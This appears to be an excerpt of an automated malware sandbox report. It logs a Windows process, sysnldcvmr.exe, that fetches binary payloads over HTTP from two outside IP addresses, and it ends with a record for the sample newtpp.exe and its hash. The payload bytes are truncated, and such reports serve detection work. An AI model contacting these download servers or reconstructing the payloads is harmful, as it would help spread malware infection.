                                                                                                                  Nov 30, 2024 01:58:45.635937929 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:45 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 63232
                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67497f08-f700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                  Nov 30, 2024 01:58:45.636059999 CET1236INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|d
                                                                                                                  Nov 30, 2024 01:58:45.636070967 CET248INData Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b
                                                                                                                  Data Ascii: a;^;3|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
                                                                                                                  Nov 30, 2024 01:58:45.636430025 CET1236INData Raw: 94 73 8b aa f1 ce f6 fb 4d 3d f8 d5 0b 49 73 ea 19 24 fd 61 5a a1 ae 74 26 ce d4 c3 49 ba b6 a2 ff c7 ce 44 2e dc 20 cb 01 b2 a5 4d 7a d3 11 4c 32 a9 c1 56 37 18 06 0b 04 2a e4 ea 08 83 e9 51 49 0a ba bc b0 d1 a9 c4 8f 89 af 0e 75 b2 3b b5 35 bb
                                                                                                                  Data Ascii: sM=Is$aZt&ID. MzL2V7*QIu;5f;kIB*w%zH-L=_k_/ipMf`N cNk^uHt(_fE:J*{O&~p^oUA4VUM@^28*Bb_Fk
                                                                                                                  Nov 30, 2024 01:58:45.636442900 CET1236INData Raw: 78 1f b9 71 14 f8 5a 8e f8 e4 b5 04 49 01 a7 1a aa 0a e0 af 5e ac f8 9e 1d 6c 78 e5 c4 c6 c0 41 95 60 5f 7d 4b c6 63 80 8b 37 a8 fc b8 f2 e1 61 52 18 dd 8c cb b2 0b fc ef 6b c0 2f 3b 05 56 18 b0 29 28 39 21 95 0d 55 7d 8b 91 68 e8 e8 e9 73 f2 84
                                                                                                                  Data Ascii: xqZI^lxA`_}Kc7aRk/;V)(9!U}hs0{TMuVZ1_7<zjv3aia>O9iF6:Ksfqi=NaBEi?Y0Oe[OmB1F_MQc ~)sWh7z4>(ou
                                                                                                                  Nov 30, 2024 01:58:45.636455059 CET1236INData Raw: 87 9c b7 44 2a f2 35 40 6d 77 32 c0 f8 65 a2 d2 24 fd 85 98 0a 2a de 08 ee 92 f4 29 7c 0f 13 14 55 30 42 e3 ee db 7b 77 f4 01 cc 78 7a 77 b9 64 06 d5 0a d3 04 b1 6f 0b ff 86 e6 69 1c 34 0b 7c 4a 1d fd 58 a5 96 f8 a3 c7 4f 1b 2c d4 73 5e 49 cb 81
                                                                                                                  Data Ascii: D*5@mw2e$*)|U0B{wxzwdoi4|JXO,s^I@Vs>?'/<AILTO8Jt)0ZbA,3Po+(v"!h3UIIgh|>_C+]`OG3de{tlnAj}xA
                                                                                                                  Nov 30, 2024 01:58:45.637382984 CET1236INData Raw: 12 8e 32 a7 3f ef 61 b1 d0 8f f3 d6 11 0e 2d 91 a5 bf 0c 01 d5 58 25 10 68 77 82 61 28 eb e3 42 12 d7 35 a1 3d 65 da 3d 75 56 c4 0a 5a fd 59 b9 78 16 bf 38 7a 62 6c 25 ee 06 bf 3e e7 87 02 03 78 29 58 75 8c 54 09 f3 72 27 a3 fa 04 56 91 a8 1a a2
                                                                                                                  Data Ascii: 2?a-X%hwa(B5=e=uVZYx8zbl%>x)XuTr'V%bv]P(_PP}zs:MTMA"G;L Y7+hf~d}MV6WN[1&@S=w@`,h]g3Fq${:T;;hkRfjF
                                                                                                                  Nov 30, 2024 01:58:45.637397051 CET1236INData Raw: ee 8b c4 3c d1 10 23 e4 9e 9a 70 4c 39 e3 64 6e cd df 50 0b 60 1c 57 70 32 5b 14 0c 8f b0 55 da 58 4e 69 29 b4 7f a6 7d 92 7e cb 79 27 e9 4e a4 03 2b 92 b4 8d 48 2a 7c d9 ae 44 d8 af de 31 c0 a8 4e db 9a 65 7e 76 11 48 ee a3 c5 1e 8f e9 50 d4 8b
                                                                                                                  Data Ascii: <#pL9dnP`Wp2[UXNi)}~y'N+H*|D1Ne~vHP<yeR],tSWbS4p>,:MU|7E\jlrCUwV%)l*tgv, 2SaUDQ'Z^CDM
                                                                                                                  Nov 30, 2024 01:58:45.637408972 CET1236INData Raw: f9 0a d5 71 7a eb da 7a 92 fa e9 31 68 c6 69 49 2a a3 2b 2b 5e 0a 63 4d 57 d0 06 20 db c7 bf 22 a4 6f 30 94 45 66 62 2f b5 d2 d2 ab 3e 53 0a da 0b c1 ec ce bd 99 3e 5c 1c fd fd ae 8f e4 31 8a 15 37 b9 08 c8 c3 68 a6 55 8d f8 ac 01 54 9d 5f e7 cc
                                                                                                                  Data Ascii: qzz1hiI*++^cMW "o0Efb/>S>\17hUT_t'J|A9H/z^Bhwc ?_7:.PpXkY."+M:.CA:O/EzVY/mQCn.Zb}@-XF9[@GukKuW*Nv
                                                                                                                  Nov 30, 2024 01:58:45.638214111 CET1236INData Raw: 64 0c 68 cb f6 1e b5 aa c0 42 35 45 ca a2 8c c1 ba 57 29 8e 18 a7 65 39 10 f6 07 95 86 68 ad 10 82 06 f9 27 44 0f aa d7 99 da 9f 6b 08 63 72 94 87 85 01 87 5c ce 53 a4 32 8d c7 9e 7c d5 ee 54 97 1d ae d1 12 2e 56 d4 1f 21 d1 a8 78 18 46 f1 54 e6
                                                                                                                  Data Ascii: dhB5EW)e9h'Dkcr\S2|T.V!xFT`URD~E@=^(HjE2w}F4k;ZDFM2;{2,B_bfR8Pmd5i+\RoTy[ 3o=KxMw.Gvp&
                                                                                                                  Nov 30, 2024 01:58:45.756170988 CET1236INData Raw: 92 03 ae 8c a6 65 d2 7a cc 2f fa a2 3b e4 22 d3 f0 5c e4 ac 4c 44 20 f7 fa 44 56 c7 aa 4d 68 7c 56 4b 25 47 69 5c 7c c7 89 c4 ba 04 c0 5f 73 4d 4e fd 14 d1 f3 90 82 e2 54 44 01 ec 50 cc e0 1c 3c 0f e0 54 35 7d 99 73 db 20 36 bb b8 d3 24 27 f9 15
                                                                                                                  Data Ascii: ez/;"\LD DVMh|VK%Gi\|_sMNTDP<T5}s 6$'H8>&s}=~~r]Hpk&e#h,p9, *f26=88{F;{TIjvWZ-;0r~ /qex^Hy3e/,j3)yX6 '5:<s@cTy^


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  54192.168.2.450094185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:47.785048962 CET166OUTGET /4 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:49.207572937 CET1236INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:48 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 55040
                                                                                                                  Last-Modified: Wed, 27 Nov 2024 12:44:32 GMT
                                                                                                                  Connection: keep-alive
                                                                                                                  ETag: "67471430-d700"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Raw: a5 d1 27 01 80 df b4 90 f7 22 59 62 49 bd 72 10 5e 6c 42 5f 1c 89 9f 02 51 4d 78 3d 5e 77 28 5e cb 02 3a 58 3a c5 e0 84 da 2e 27 a6 19 84 4a 4f ee 08 33 84 cf 6b 04 b9 e1 3e 23 3e 89 7e fa 42 48 bc f9 b6 1e 73 91 7d 1f 65 ed a5 9a 66 26 40 c5 ff 74 8c 9d be 8a 65 1f 22 55 01 91 b5 68 4b 9a 48 57 10 d8 49 66 f1 5c 5d 98 bb 7c f8 41 87 54 8d 73 20 d1 5a c0 f4 bb 58 ad 46 80 bf 8b 88 96 66 f9 b3 b9 6c 03 e9 ac 53 0f 7e f4 90 e9 0b 3b ff 5f 10 92 6f fb 43 1d d2 b0 a7 96 02 e1 92 48 dc 16 5d e7 b9 11 2f a3 11 ba d4 06 8d 1b f8 90 b0 c0 2b ed 69 c6 3c bc 1e 69 d9 aa 13 bd d3 fc 63 04 97 ef 16 56 c3 bf 5c ec 7a 5f 20 33 b8 8c e6 b4 e8 48 e6 ec 7e 55 2c 56 17 55 9c 72 0a 50 65 41 b1 23 fc 0d 96 40 37 50 9a 83 06 ce 95 c0 60 4e 59 a0 5b 96 20 02 a5 2b 93 26 ea 8f 4e 19 b6 85 78 a4 7e 49 13 fd 9e 97 e4 aa 8f 81 01 9f 15 9d 90 f4 f4 a0 eb 9a a0 44 ba 98 14 42 87 ea ca fa 9a bf 1d a3 b3 b2 90 5c f6 14 db 1b 2f de 0f 92 6e c5 c2 28 2b 32 35 76 91 c5 36 98 6a c5 d0 4c b7 25 38 5c a0 5e 3f 5d 02 d4 1b be e7 00 ff [TRUNCATED]
                                                                                                                  Data Ascii: '"YbIr^lB_QMx=^w(^:X:.'JO3k>#>~BHs}ef&@te"UhKHWIf\]|ATs ZXFflS~;_oCH]/+i<icV\z_ 3H~U,VUrPeA#@7P`NY[ +&Nx~IDB\/n(+25v6jL%8\^?]xZI>ri[@s:p2yO6Q`L,h=8KLKZqaY=7"N5)/I&Os},D>)AS7rEpgsIuV`'A$]`\c3)xe.uW=Y"!-/if{":BKsWc%rW&dJ+g4a`2i=Pp*ks@?wCamFyN7y]Mg<.|smCvDO^_5NjX>,aF:S1xSgsP_z(FHOgZclxIq{.FQ=K3-kFI'~6eKLX 1:YO]S^mpkEbWXcF!wU4W]RHTcwkxbZm#&<r_Ee:gaP#_(3tjO
                                                                                                                  Nov 30, 2024 01:58:49.207609892 CET124INData Raw: bb 3b 85 b5 56 c5 2a c5 de 28 e1 3a dd 6f 3f 3a 35 2d 53 79 7e b4 92 56 8e 87 da 28 35 12 36 e0 18 20 92 8f 17 51 d3 85 ff ee 32 e6 b3 3f 49 46 e4 34 32 6f d5 de f6 12 6b d8 23 43 17 fb b0 d6 3e 12 29 ee 91 88 fe 40 dc 1e 83 38 56 54 9b 20 93 66
                                                                                                                  Data Ascii: ;V*(:o?:5-Sy~V(56 Q2?IF42ok#C>)@8VT f`:zd!UT&RNEBUNfy7
                                                                                                                  Nov 30, 2024 01:58:49.207699060 CET1236INData Raw: 69 ec 34 68 6c f0 51 19 4a 05 6f 5b f7 52 78 a6 e3 9e 5b 6e 40 c2 04 fc 67 d9 a2 55 35 36 51 a0 57 4f d4 14 8c 0a 2e 7c 79 44 de 45 8d 1e 2e 62 80 72 66 47 cc 59 3c e4 fe 4e d7 8b 45 24 3b ab 46 40 e5 d7 c4 0a bb fe b0 36 47 2a 32 72 ea 8f 88 2e
                                                                                                                  Data Ascii: i4hlQJo[Rx[n@gU56QWO.|yDE.brfGY<NE$;F@6G*2r.2(z|FS\e<klZ'>'ex63{A' !w5wG!(sI1GkrH}I=0$P+k8fm3zLiJIFM
                                                                                                                  Nov 30, 2024 01:58:49.208025932 CET1236INData Raw: d3 82 1d d8 c6 ca 7a 16 e7 d8 d4 24 41 68 71 29 24 f7 9c fc aa 1d 63 cb 0b 19 e5 5f ec ba 5d 5c 13 de 51 76 e8 90 4f b4 84 37 e2 4a 79 5f c9 d1 f9 bf ad 8b 45 44 3b 42 31 d9 71 d7 06 38 b7 e8 a8 64 c5 04 e2 b6 0f 4a fc c7 a8 f4 9f cc 9d 35 c4 2d
                                                                                                                  Data Ascii: z$Ahq)$c_]\QvO7Jy_ED;B1q8dJ5-H?];91oElK4V #~U#T\^rtBLZhpiVp_Z=9?Pv2DCVE#,uoL@Vm0Ke,3,q>
                                                                                                                  Nov 30, 2024 01:58:49.208036900 CET248INData Raw: 9a 2f 39 d8 07 79 ab 65 57 3a a0 33 03 a7 6e dc 09 8f 28 23 93 a8 0f b2 67 f8 e0 3c d7 1c 14 d1 0d 74 72 cb 93 e7 37 3b 47 96 7a 62 49 9f ed c2 3d dc 94 0b 56 d9 42 83 8d 53 84 59 ca 7e 66 98 6e 7c ca 6f 5f f5 c3 5e 35 1a 97 bb 2e 7e 2f 13 b6 33
                                                                                                                  Data Ascii: /9yeW:3n(#g<tr7;GzbI=VBSY~fn|o_^5.~/3h_Cy1Hz*URy^lxvYf?X8/ qa,Y+s6+zyyfId,}<UF<;'j"A_q_lYG$t`
                                                                                                                  Nov 30, 2024 01:58:49.208393097 CET1236INData Raw: f0 88 d1 dd 88 8b 89 c0 d8 bc e6 2d 69 10 5e aa bd 83 ab ee a4 fc 89 4c 76 23 ba 16 d5 7f 3b d5 16 7b 0e ca ee 2d fc 35 a2 ae 46 bf f2 0d 2c 18 ee 64 16 13 85 25 f3 19 93 00 b1 04 c5 c9 fb cf 8d 26 c9 01 93 23 b2 bd 4b 28 83 a5 0a b7 94 e6 4d d8
                                                                                                                  Data Ascii: -i^Lv#;{-5F,d%&#K(MW,gf"=g,Fnl*8NBa&6`=/s*:[ n*[c|oic5dPFi{~)E~R"<t%E\o,7*'d:JKr
                                                                                                                  Nov 30, 2024 01:58:49.208406925 CET1236INData Raw: 3e d7 e2 1d 60 06 01 e8 6b f4 13 e9 af a5 c1 6c 23 b4 3c d6 0f df cc e8 aa 41 51 3d c3 4f 46 b4 97 04 44 79 86 da 65 f8 25 98 b1 e7 0c 7c b4 5b d2 c2 d8 c9 fb a9 ba 4f d7 ae ef ae 15 3d f7 45 78 cf 26 7e 2d d8 95 38 20 9e 35 1a 21 3f 33 ea d5 fb
                                                                                                                  Data Ascii: >`kl#<AQ=OFDye%|[O=Ex&~-8 5!?3{`v*nker2V#kZHqxc.";E.qMI>XI^ ]WYC$yP['O:*@zZ-^
                                                                                                                  Nov 30, 2024 01:58:49.208843946 CET248INData Raw: e7 83 33 8a 59 ce bd b9 d7 ac 1b 2d c3 d2 f4 07 de 07 41 7e de ac d3 c5 ea da 3d 38 89 45 53 d8 d5 37 22 4b 38 8f c7 e8 5c 02 49 18 ad 12 3b a2 56 93 22 36 53 46 2d 16 79 c7 fb a7 1f 1c cc ec a3 86 55 3a f4 47 55 d9 1e c0 04 76 7a 58 66 a1 28 fa
                                                                                                                  Data Ascii: 3Y-A~=8ES7"K8\I;V"6SF-yU:GUvzXf(t2yJ@j+l|t5<{[!h c_Kx=ACK~#O7L]=D,MGm^+bQg^ oK$z4H4%+5r[E?
                                                                                                                  Nov 30, 2024 01:58:49.208981991 CET1236INData Raw: e5 df 71 cd 37 76 0e c6 52 6e a4 8e 0f 16 54 21 74 70 c2 47 ba 9f b9 41 2a a7 75 4f 04 0a dd 7f b1 33 8f fc 9f be 05 51 b6 b5 5c 37 b9 f0 0c 80 09 af 3d a8 94 d8 7b 38 4e 80 49 b7 4d 50 15 04 c8 99 c3 12 c9 0c 58 5e 7e 75 a6 02 8d db a6 68 23 16
                                                                                                                  Data Ascii: q7vRnT!tpGA*uO3Q\7={8NIMPX^~uh#g\98c2"*AC&h-nQe)6@kWvLq+&DsbQobfeg-7, sKVN6L$=q%H2}j_Y^7.7,e1zb
                                                                                                                  Nov 30, 2024 01:58:49.208993912 CET1236INData Raw: 78 e1 80 d4 e8 44 8d 9d b8 f2 04 a8 25 0c af d0 b2 bb 8f 07 96 dc 25 ee e9 be 9b 84 8a 7f 78 e0 59 a8 24 91 6a 6d e1 17 d7 b3 c6 2f 4f 2f 7b cd 2c 5f 5d b2 f1 4e d7 ea 76 fd dc ff e9 c2 c0 cd 33 01 ef 79 32 5e 5b 14 d6 63 50 61 53 9e d5 1e 5a b3
                                                                                                                  Data Ascii: xD%%xY$jm/O/{,_]Nv3y2^[cPaSZ!;]CJhc#V.WB;0Wt{dW1j/owjun2}$RV0awDeSfb!^zK}BvH*@%n3lo 6f'5-
                                                                                                                  Nov 30, 2024 01:58:49.327677965 CET1236INData Raw: 86 7f b2 4c cf 50 34 41 d8 dd 51 ff a4 a8 19 d8 e2 0a 05 af 73 0f f4 c1 b8 7f 06 d7 e1 cc e8 7e 9e f9 38 99 04 b4 23 f8 16 7c 08 17 61 63 1c 04 12 9a d0 22 b5 1e 15 b6 cf 26 76 b4 4f e3 18 85 c9 98 eb af bd 98 13 41 62 6a a4 76 b4 e9 35 91 2c d3
                                                                                                                  Data Ascii: LP4AQs~8#|ac"&vOAbjv5,K&{/'e)9qZ3{3'C+,qN*!v.*Dt!R:&re=L<.-X8;bqn%/`az\ube%I#&s


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  55192.168.2.450096185.215.113.66801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:51.360363960 CET166OUTGET /5 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 185.215.113.66
                                                                                                                  Nov 30, 2024 01:58:52.839843988 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:52 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  56192.168.2.45009891.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:55.999177933 CET166OUTGET /1 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:58:57.377428055 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:58:57 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  57192.168.2.45010091.202.233.141801516C:\Windows\sysnldcvmr.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 30, 2024 01:58:59.586822987 CET166OUTGET /2 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                  Host: 91.202.233.141
                                                                                                                  Nov 30, 2024 01:59:00.988385916 CET728INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Sat, 30 Nov 2024 00:59:00 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 564
                                                                                                                  Connection: keep-alive
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:19:54:52
                                                                                                                  Start date:29/11/2024
                                                                                                                  Path:C:\Users\user\Desktop\newtpp.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\newtpp.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:80'896 bytes
                                                                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

